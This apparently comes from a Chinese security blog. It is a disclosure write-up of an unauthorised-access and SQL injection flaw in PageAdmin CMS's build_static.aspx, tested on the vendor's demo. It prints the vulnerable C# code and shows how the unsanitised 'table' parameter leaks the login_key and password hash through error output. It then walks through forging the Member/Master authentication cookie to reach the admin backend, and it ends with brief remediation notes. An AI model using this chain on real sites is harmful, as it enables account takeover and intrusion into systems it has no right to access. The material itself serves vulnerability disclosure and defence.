PageAdmin CMS最新版SQL注入(官方DEMO测试)

  PageAdmin CMS最新版SQL注入

  #1 一个越权 /e/master/build_static.aspx

  ?

  1

  2

  3

  4

  5

  6

  7

  8

  9

  10

  11

  12

  13

  14

  15

  16

  17

  18

  19

  20

  21

  22

  23

  24

  25

  26

  27

  28

  29

  protected void Page_Load(Object src,EventArgs e)

  {

  Ids=Request.QueryString[“ids”];

  Table=Request.QueryString[“table”];

  Conn Myconn=new Conn();

  conn=Myconn.OleDbConn();//获取OleDbConnection

  switch(Table)

  {

  case “pa_zt”:

  Build_Lanmu();

  break;

  case “pa_zt_sublanmu”:

  Build_SubLanmu();

  break;

  case “pa_lanmu”:

  Build_Lanmu();

  break;

  case “pa_sublanmu”:

  Build_SubLanmu();

  break;

  default:

  Build_Detail();

  break;

  }

  }

  #2 注入点

  ?

  1

  2

  3

  4

  5

  6

  7

  8

  9

  10

  11

  12

  13

  14

  15

  16

  17

  18

  19

  20

  21

  22

  23

  24

  25

  26

  27

  28

  29

  30

  31

  32

  33

  34

  35

  36

  37

  38

  39

  40

  41

  42

  43

  private void Build_Detail()

  {

  conn.Open();

  if(Ids!=null && IsNum(Ids.Replace(“,”,””)))

  {

  Build_Html BH=new Build_Html();

  if(IsNum(Ids))

  {

  sql=”select id,site_dir,static_dir,static_file,lanmu_id,sublanmu_id from “+Table+” where html=2 and id=”+Ids;

  }

  else

  {

  sql=”select id,site_dir,static_dir,static_file,lanmu_id,sublanmu_id from “+Table+” where html=2 and id in(“+Ids+”)”;

  }

  OleDbCommand comm=new OleDbCommand(sql,conn);

  OleDbDataReader dr=comm.ExecuteReader();

  while(dr.Read())

  {

  try

  {

  BH.Build_Detail(dr[“site_dir”].ToString(),dr[“static_dir”].ToString(),dr[“static_file”].ToString(),dr[“lanmu_id”].ToString(),dr[“sublanmu_id”].ToString(),dr[“id”].ToString());

  }

  catch(Exception e)

  {

  LocalUrl=”http://”+Request.ServerVariables[“SERVER_NAME”]+”:”+Request.ServerVariables[“SERVER_PORT”];

  SiteDir=dr[“site_dir”].ToString();

  SiteDir=(SiteDir==””?”/”:(“/”+SiteDir+”/”));

  ErrorUrl=LocalUrl+SiteDir+”index.aspx?lanmuid=”+dr[“lanmu_id”].ToString()+”&sublanmuid=”+dr[“sublanmu_id”].ToString()+”&id=”+dr[“id”].ToString();

  Response.Write(ErrorUrl+”生成失败:”+e.Message);

  Response.End();

  break;

  }

  }

  dr.Close();

  conn.Close();

  Response.Write(“success”);

  Response.End();

  }

  Response.Write(“Invalid Ids”);

  Response.End();

  }

  其中Table参数可构造:

  ?

  1

  sql=”select id,site_dir,static_dir,static_file,lanmu_id,sublanmu_id from “+Table+” where html=2 and id=”+Ids;

  且会产生错误回显:

  ?

  1

  2

  ErrorUrl=LocalUrl+SiteDir+”index.aspx?lanmuid=”+dr[“lanmu_id”].ToString()+”&sublanmuid=”+dr[“sublanmu_id”].ToString()+”&id=”+dr[“id”].ToString();

  Response.Write(ErrorUrl+”生成失败:”+e.Message);

  #3 构造请求可得到login_key(见POC),鉴权cookie中的valicate由以下代码生成,且LoginKey被存入数据库login_key字段:

  ?

  1

  2

  3

  4

  5

  6

  7

  string LoginKey=Guid.NewGuid().ToString(“N”)+LoginDate.AddSeconds(r.Next(1,2592000)).ToString(“yyMMddHHmmss”);

  Md5 Jm=new Md5();

  HttpCookie MCookie=new HttpCookie(“Member”);

  MCookie.Values.Add(“UID”,UID);

  MCookie.Values.Add(“Valicate”,Jm.Get_Md5(LoginKey));

  Response.AppendCookie(MCookie);

  Update_Member(UID,LoginDate,LoginKey);

  #4 利用本地pageadmin环境进行login_key的加密:

  ?

  1

  2

  3

  新建test.aspx<% @ Import NameSpace=”System.Data.OleDb”%>

  <% @ Import NameSpace=”PageAdmin”%>

  

  #5伪造cookie即可进入后台

  ?

  1

  2

  **.**.**.** FALSE / FALSE Master UID=2&Valicate=abd2128c766f990f7b4ec19c137e452117db

  **.**.**.** FALSE / ALSE SiteId1

  #1使用poc获取报错

PageAdmin CMS最新版SQL注入(官方DEMO测试)

  ?

  1

  http://**.**.**.**:80/2/index.aspx?lanmuid=bae915239122142b5101e319cf516ef3e371121&sublanmuid=f3fac35c66184f9281b221fa41ddbf59_160123191804&id=2生成失败:The remote server returned an error: (404) Not Found.

  其中sublanmuid的值为login_key,lanmuid的值为密码

  #2得到加密后的valicate

  abd2128c766f990f7b4ec19c137e452117db

  #3伪造cookie进入后台

PageAdmin CMS最新版SQL注入(官方DEMO测试)

PageAdmin CMS最新版SQL注入(官方DEMO测试)

  解决方案

  #1 页面鉴权

  #2 sql_format

发表评论